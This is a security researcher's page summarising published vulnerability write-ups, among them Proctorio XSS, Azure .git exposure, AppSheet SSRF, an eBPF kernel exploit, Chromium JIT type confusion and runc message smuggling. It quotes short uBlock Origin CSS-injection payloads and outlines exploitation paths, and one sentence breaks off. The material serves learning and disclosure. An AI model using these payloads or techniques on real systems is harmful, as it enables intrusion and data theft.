Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Proctorio Chrome extension Universal Cross-Site Scripting- 713

Sector 7    Reference →Posted 4 Years Ago
  • With the rise of online schooling, teachers need to ensure students could not cheat during tests. A way to prevent cheating on tests is the Proctorio Chrome extension, which can view internet traffic, alter the page and many other things.
  • The extension inspects web traffic of the browser. Depending on the paths that are configured via the administrator, it will inject content into the scripts of the page. Once a test has started, a toolbar is added with a number of buttons, such as a calculator.
  • When the = button is ran, a computation via the JavaScript eval() function is called. Since the input is never checked for mathematical expressions, we have XSS within the context of the Chrome Extension.
  • XSS is a bad vulnerability to find. In the context of a browser extension that can always be triggered, this turns into universal cross-site scripting. By sending a URL that matches the demo mode for the chrome extension, the calculator can be called in order to control to get XSS in the extension.
  • The extension content script does not have the full permissions of the extension. But, major damage can still be done. Using XSS, a request can be made that bypasses the same origin policy to return arbitrary data. For instance, an attacker could steal emails from an inbox or anything else on any website that is visited. Damn, that is a real bad bug!

NotLegit: Azure App Service vulnerability exposed hundreds of source code repositories- 712

Shir Tamari - Wiz.io    Reference →Posted 4 Years Ago
  • Azure App Service is a cloud computing platform for hosting websites and web applications. The service is meant to be super easy to use to deploy code quickly. The code can be pulled via SSH, Github or other places.
  • A classic website configuration problem is exposing the sensitive files on the server by accidentally exposing them in the web root of the server. Included in this category of sensitive files is the .git folder.
  • .git holds all of the information about a git repository from the first commit to the most recent. By getting access to this directory, it is possible to recover the entire source code from the application!
  • Source code may have hardcoded passwords, important intellectual property and many other sensitive pieces of information. Being able to steal the source code is a terrible vulnerability.
  • The solution that Azure App Services implemented for this was to add information to the web.config. Since web.config is only C# specific, this mitigation only worked on C# applications. As a result, deployments for PHP, Ruby, Python and Node that uses Apache, Nginx, Flask and many other things were vulnerable to this attack.
  • This vulnerability is incredibly simple and I am astonished this went unnoticed for 4 years (since 2017). As an attacker, I would be rather lucky than good!

SSRF vulnerability in AppSheet - Google VRP - 711

David Nechuta    Reference →Posted 4 Years Ago
  • Google Appsheet is a no-code app generator. While looking around for functionality, they found a section called Workflows which made it possible to automate app behavior via rules. One of these options was a webhook.
  • Since these hooks required a URL, they placed an internal URL to try to steal the metadata information from the instance, which would include keys for the box. However, they ran into a problem: he needed to make a GET request when the application only supported POST/PUT requests.
  • In order to get around this problem, they make the request to a separate website that they control. In the response, they send a 301 redirect to change the URL to be internal and the request method to be a GET request. Amazingly enough, this worked for getting back the access token!
  • It turns out that the API would accept a POST or GET request, which made the shenanigans above not necessary. Try the stupid simple thing first!
  • The fix was to disable the legacy API for metadata information, which the author had used in their exploit originally. Additionally, the addition of the Metadata-Flavor was banned, since it was required for the request, making SSRF not exploitable. However, the webhook could add custom headers. They found that an alternative to the Metadata-Flavor could used to trigger the metadata request: X-Google-Metadata-Request.
  • Overall, good read with some neat SSRF tricks!

uBlock, I exfiltrate: exploiting ad blockers with CSS- 710

Gareth Hayes - Portswigger    Reference →Posted 4 Years Ago
  • uBlock origin is a popular ad blocker. This works by community provided filter lists, which work by using CSS selectors to determine which elements to block. Since these lists are not entirely trusted, the need to be constrained from running arbitrary CSS. So, is there a way around this? That is what this post is all about! Major S/O to Zi on DayZeroSec for explaining and diving deeper into how these work.
  • The research all started from a Tavis Ormandy post on CSS injection. The payload is just like below:
    example.com##div:style(--foo: 1/*)
    example.com##div[bar="*/;background-image: url(https://google.com);}/*"]
    
    The key to this is the /*, which is a code comment. By adding this comment in one block, then ending it in another block, the CSS selector can be escaped to add arbitrary CSS.
  • The vulnerability above was patched by adding a check when operating on styles to not allow opening or closing comments. To bypass this security check, simply open up a comment NOT in the styles to trigger the same CSS injection bug as before. Blocking the comment was just not enough. The POC is shown below:
    ##input,input/*
    ##input[x="*/{}*{background-color:red;}"]
    
  • The fix for this was more global in scale instead of denylisting a few characters. Instead of trying to detect the selectors via code, they use an actual style sheet to validate that the filter cannot be injected. If the filter as injection into the style sheet, then the program will now catch it. It is awesome to see a global fix to this problem!
  • After this, the author decided to see if the cosmetic filters functionality, which allow for powerful CSS selectors, could be bypassed. The same trick for using a starting comment on one line and an ending comment in another allowed for the smuggling of a payload as well. This payload works since the validation code for document.querySelector allowed invalid syntax. This was fixed by checking for opening and closing comments in the rules.
  • At this point, the obvious attack vectors were gone with the comments running out of life. Gareth Hayes decided to fuzz what was allowed and what is not allowed in CSS. They noticed that a CSS selector can also use curly braces to add more functionality inside of it. Adding onto this though, if there is no closing curly brace for the selector, then a semicolon will NOT result in the starting of a new rule. Instead, it would add TWO selectors to the code, smuggling in a single one.
  • The reason for this being possible is better explained in the DayZeroSec post linked above. The patch limits the amount of CSS style declarations added in the case of one being smuggled in (as above). The vulnerable code path tries to ensure that a non-zero value is returned, which leaves a lot of wiggle room! Although this is not perfectly correct since, when something is smuggled in, more than 1 (such as 2) selectors could be added in.
  • The patch for this was to prevent all smuggled in selectors from being used by adding in a specific check to ensure that the amount of added selectors is exactly 1. Failing closed as opposed to failing open makes a big deal in security sensitive operations such as this one! The POC for this exploit is shown below (notice the missing curly brace):
    *#$#* {background:url(/abc);x{  background-color: red;}
    
  • The final bypasses were specific to different browsers. While the powerful url was blocked from usage in the CSS, some browser specific functions were not. In Chrome, image-set could be used to exfiltrate data using only CSS.
  • With CSS injection, how do you do anything useful? Obviously you can alter the page for phishing but can you steal data? Using attribute-based selectors, it is easy to steal information. The author of the post creates a CSS keylogger, which could be used to steal passwords and other sensitive information. They even though a way to steal the first N-characters using selectors in Firefox.
  • To top it off, they found a JavaScript URI injection into a list. But, the great CSP used by uBlock origin made it impossible to exploit. Overall, a few good takeaway:
    • Fix classes of bugs by addressing the root cause of the problem. This was done multiple times by the uBlock Origin team throughout this process.
    • Fuzzing formats can be useful when trying to smuggle in data. Gareth Hayes has done this in a few other cases with great results!
    • Allowlists are much better than denylists! Banning certain functions will lead to somebody finding a new one to use and bad error checks will always be exploited.

USB Over Ethernet | Multiple Vulnerabilities in AWS and Other Major Cloud Services- 709

Kasif Dekel - Sentinel One    Reference →Posted 4 Years Ago
  • Amazon WorkSpaces is a fully managed and persistent desktop virtualization service that enables users to access data, applications, and resources they need anywhere from any supported device. Session information is handled via HTTPs but the stream is handled via PCoIP or WSP (Workspaces Streaming Protocol. WSP uses many third party libraries in order to make the virtual PC feel like it is more physical than it really is, such as USB over Ethernet by Eltima SDK.
  • USB redirection is done by the Eltima SDK. The Kernel IO Manager (IOMgr) controls the flow of the information between kernel and user mode. When a user-mode request is sent via a IRP_MJ_DEVICE_CONTROL packet, the input and output data depend on the IOCTL code that is invoked. The CONTROL CODE is a 32-bit value with several fields, including the field TransferType.
  • This field indicates how the NtDeviceIoControlFile syscall will return data. There are three different modes for this: METHOD_BUFFERED, METHOD_IN/OUT_DIRECT and METHOD_NEITHER. The first one will copy the caller input data into the user provided buffer. The second version will supply an memory descriptor list (MDL) and ensures that our thread has access to this information. The final one takes in a user-mode address and reads/writes into this with no validation. Of course, the driver uses the insecure METHOD_NEITHER
  • METHOD_NEITHER by itself is NOT secure. However, the IOCTL handler is responsible for validating, probing, locking and mapping the buffer, depending on the use case. Since this is the case, double fetches, TOCTOUs, bad pointer dereferences and other vulnerabilities may be possible to exploit. Although this is not a vulnerability by itself, it is a code smell that should be checked out.
  • While reviewing the code handling for these IOCTLs, the author noticed that the size parameter given by the user request was blindly being trusted. Later on, this size was used with a multiplication operation which could easily be overflowed. Additionally, the copy operation was not verified to be smaller than the allocation!
  • The proof of concept has an allocation size and a copy size. To exploit this, they set the allocation size to be smaller than the copy operation size. Then, when a copy operation happens, a trivial buffer overflow happens with the user controlled write value. Since the data and size are both controlled, this leads to a highly exploitable vulnerability.
  • An additional point of concern is that the IOCTL does not have any ACL enforcement turned on. This means that the vulnerability can be triggered via several different mediums, such as the browser (if they didn't do their own filtering).
  • In the disclosure timeline everything seems fairly normal except the vendor that created the library. They claimed to have known about the bug but said that it was not possible to hit the code path because the feature was turned off. After a back-and-forth discussion with them, Eltima eventually pushed a new build with the vulnerabilities fixed. It's not a bug, it's a feature!

Local Escalation of Privilege Ubuntu Desktop- 708

Flatt Security     Reference →Posted 4 Years Ago
  • eBPF (extended Berkley Packet Filter) is a Linux kernel functionality that allows code to run in the context of the kernel without gaining further privileges. In order to do this, there is a verification step to ensure that all of the actions are memory safe. Because it runs in the kernel, it is faster than running it is userspace.
  • eBPF has many different map data types with one of them being a ring buffer (circular queue). When creating the file descriptor, two calls to allocate dynamic memory are made. One of them is the bpf_ringbuf_map and the other is bpf_ringbuf.
  • bpf_ringbuf_map contains a pionter to the bpf_ringbuf. bpf_ringbuf contains a consumer and producer position alignment and page aligned data, where this memory is mapped twice to give a ring buffer feel. In the eBPF bytecode, the data has a memory allocation for the data; this is essentially a call to malloc in the eBPF world but has to be a static value. The verifier knows this value because it is passed in as a const during the verification process.
  • The size of the allocation should not surpass the value passed to the verification function; this is the key to the bounds checking of the function. The main verification for the index check is the consumer and producer positions in the buffer. The check verifies that producer position - consumer position is less than the size of the buffer. This makes sense but has a terrible flaw in it.
  • The vulnerability comes from the fact that the data can be mmaped directly with the data not being validated after this alteration. The main check, mentioned above, can then be manipulated to pass by altering the producer and consumer position values so that the eBPF allocation goes much too large for the memory given to it. This leads to an out of bounds read and out of bounds write in the kernel.
  • With this primitive, the exploit strategy is fairly straight forward for the kernel. First, they create a read and write function to abstract away the vulnerability above and to only worry about exploitation. eBPF has many different protections in place to prevent exploitation, which limited the functionality that could be used in this exploit.
  • The author allocates two adjacent bpf_ringbuf structures and a kernel stack for exploitation. This is achieved by creating huge maps and then spawning a bunch of processes. Eventually, this lines up the way the attacker wants. Once the memory feng shui is done, the out of bounds read can be used to leak kernel pointers from the bpf_ringbuf object.
  • Once the randomness has been broken, we can overwrite the kernel instruction pointer on the stack in order to start a ROP chain. Since this is another process, we need to force it to pause while our full exploit happens. This is done by calling the syscall read and waiting to write to the buffer. With a full ROP chain setup, with user controllable values from the primitive above, popping a root shell is trivial.
  • One thing to note is that the read syscall function call does not have to be adjacent to our block. This is because we can search for the address of read until we find the kernel address that it would be at until the end of the function. That is super neat and takes out a lot of the system randomness.
  • Overall, this was a super interesting vulnerability in the Linux kernel! Verifying running code is extremely hard to do. Even with all of the effort and mitigations in place, eBPF has been a security problem for a little while. This shows that deeply understanding a code base allows for the discovery of vulnerabilities though :)

Making it rain with Software Defined Radio- 707

RK - Spurious Emissions    Reference →Posted 4 Years Ago
  • This post starts with a device that the author wants to hack: a wireless weather station and a temperature sensor. They knew it was using some custom protocol to communicate the temperature to the base station but did not know how.
  • The author had an RTL-SDR and an Adalm-Pluto. The Adalm-Pluto is Analog Devices (the company) branded education level SDR. This SDR has a 20MHz bandwidth, 12-bit ADC & DAC, full duplex, Gnu radio blocks and a range from 325MHz-3.8Ghz. These and the tool Universal Radio hacker (URH) were great starting points for this project.
  • The device itself had a carrier frequency labeled on it at 915MHz. When going to this on a spectrum analyzing, there were two peaks. Two distinct peaks indicates binary (0,1) frequency shift keying (FSK) in order to communicate the data. From looking at the spectrum analyzer, the communication occurred every 12 seconds ont the dot about the temperature.
  • The author absolutely abuses Universal Radio hacker for this project. Using this tool, it automatically decoded the symbol rate, samples per symbol and the modulation type (obviously FSK). From there, they took a bunch of recording with the device in several different locations, such as the freezer with specific temperatures.
  • Once they had 10ish recordings, they began to analyze the protocol. Once they began analyzing, they realized URH had done the automatic decoding wrong, which led them down a path of manually calculating some of the parameters for the calls. Eventually, they got a data that looked consistent enough to attempt to really decode.
  • The protocol had two beginning portions: a preamble of A's (0x1010) then a sync word to sync up the timings once everything had been completely powered on. It is common in a lot of RF communications to have both of these values. The middle portion contained a slightly different values that appeared to be the temperature. Finally, there were two values at the end that they were unsure of but were likely a CRC.
  • The payload were binary coded decimal (BCD) digits shifted by a -40C offset. They found this common practice out by googling online, since the initial values were confusing to the author. The -40 offset is because they did not want to send negative numbers.
  • What about the CRC? The author attempted to use the built in CRC maker in URH with all the different parameters but did not get anywhere. They tried online but nothing checked out. Eventually, they ran into a project that called CRC_RevEng which, given enough inputs, will find the proper parameters for the CRC check. Neat!
  • After doing all of this work, they noticed a simple replay attack works. Even cooler, in URH, they could change the temperature information from the signal where the CRC would automatically be updated. Once this was done, URH could be used to transmit the signal to the weather station. Cloudy with a chance of pwnage!
  • The author had some issues making this work on other devices though. Eventually, they figured out what the 8th and 9th nibbles were: a synchronized time to transmit the signal from the thermometer to the base station. There were 256 possible timing that it chose at bootup; this allowed for the station to ONLY listen at this interval and sleep otherwise.
  • The two channel mode just had a different timing interval. Besides this, everything was exactly the same as the previous protocol. Overall, I really appreciated the article with practical knowledge on using URH, the CRC repo and practical knowledge in protocol reverse engineering. Good work mate!

Understanding the Root Cause of CVE-2021-21220- 706

Hossein Lotfi - ZDI    Reference →Posted 4 Years Ago
  • Validation and actuality are the causes for some of the biggest bugs around! This blog post goes into a difference between how the optimizer sees code and how the code is actually represented in Chromium.
  • The proof of concept is literally 6 lines of code, which is absolutely wild for a JavaScript 0-day. The first part of the bug is when InstructionSelector::VisitChangeInt32ToInt64 converts a 32 bit integer into a 64-bit integer by either sign extending or padding the value with 0s.
  • While dealing with optimizations, the exploiteers found an edge case: if the value is XORed with 0, then we can PROVE the value should be the original output. If this is true, then the XOR operation can be entirely removed from the code during the optimization phase.
  • Here is where everything perfectly collides: the new value from the optimization is now UNSIGNED, even though it should be SIGNED. When the case is hit with an unsigned number, the new value gets changed after the optimization. This unsigned to signed problem creates a type confusion which is likely exploitable.
  • In the POC, the original value is -2^32 and the JITed value is 2^32, demonstrating an issue when the expected vs. real representation of the value. The authors of this post have a substantial amount of debug information in this post as well, which may be useful if you are getting into Chromium hacking.
  • In a followup article, they actually exploit this bug. How can a simple bad JIT interpretation turn into RCE? Let's find out!
  • Previously, turning an bad numeric result into an OOB read/write was done by abusing array bounds check elimination optimization. However, the optimization that allowed this to happen was removed because of how often it was exploited. The authors found a new strategy that was mentioned at Pwn2Own 2020 by abusing ArrayPrototypePop and ArrayPrototypeShift.
  • Array.shift removes the first element from the array, returns the removed element then computes the new size of the array by subtracting one. By abusing the original vulnerability and using it for the size of an array, the confusion is created. By running Array.shift, the length of the array will become -1, since there is no bounds check at this point in the optimization as everything is supposed to be safe.
  • Since the subtraction leads to an integer underflow of the length, the array now has infinite size. This means that we have a relative read/write for the entire memory space. They use this to create an addrof (address of) and fakeobj (fake object) primitives.
  • After creating the primitives, they use it to leak the address of a wasm function they created. Since the wasm
  • Overall, a good series of posting on modern exploitation in the browser. It is absolutely wild how complex these issues are becoming but are still weaponizable.

refcount increment on mid-destruction file- 705

Jann Horn - Project Zero (P0)     Reference →Posted 4 Years Ago
  • ep_loop_check_proc is trying to increment a reference count of a file in the Linux kernel via a call to get_file(). However, get_file() does not do the proper sanity checks on the file prior to access: only get_file_rcu() does.
  • In the epoll Linux subsystem, this becomes a problem because ep_loop_check_proc only has a weak reference to the file. Since this weak reference is NOT enough from it being deleted, it can be deleted while being used in ep_loop_check_proc. This created a use after free on the object. Even though this leads to a use after free, the author of the post labels this as a object state confusion bug.
  • The vulnerability was introduced while trying to fix another vulnerability that dealt with reference counting. This patch was attempting to validate that when adding a new fd to epoll, the deletion does not occur concurrently to this. The attempted fix was to check the reference count of the file via get_file, which is where the bug was introduced at.
  • Fixing concurrency bugs is incredibly hard! There are so many ways for an object to be affected and it is hard to consider all of the cases for this. Good bug find!

Insecure Handling of Bind Mount Sources- 704

Fwilhelm - Project Zero (P0)     Reference →Posted 4 Years Ago
  • runc and libcontainer are what makes Docker, Docker. This handles all of the chroot, namespaces and everything else in between. Docker adds a nice wrapper around all of this to make it more practical to use and install things. runc is written in GoLang and libcontainer is written in C.
  • The interface between C and Go is an important one to consider. A non-issue in Go may be a terrible issue in C, if things are not handled properly; differences between languages can make a big difference! When communicating from runc about the bind mounts via a Go to C call, the Go string can have embedded nullbytes inside of it.
  • The communication between the Go and C library, for communicating the Bind mounts above, is all separated by nullbytes from message to message. As a result, this created a message smuggling bug when the Bind Mount had an embedded NULLbyte inside of it. An example way to exploit this would be to bypass hostpath restrictions in Kubernetes clusters.
  • When sending a message from Go to C, there are two fields: an uint16 for the length of the message and a byte[] for the bytes themselves. Even though this looks totally fine, the length can be overflowed! This resulted in another smuggling bug since we can now specify all of the data in a message, even though we should not be able to.
  • Using the bugs together, it would be possible to create an arbitrary message. This message could do some malicious things, such as specifying the container to have the CLONE_FLAGS_ATTR. This would give the container access to the host namespace.
  • Interfacing with other languages can be complicated because of the inherit differences in the representation of data. Additionally, integer overflow issues exist in all languages. So, watch out world!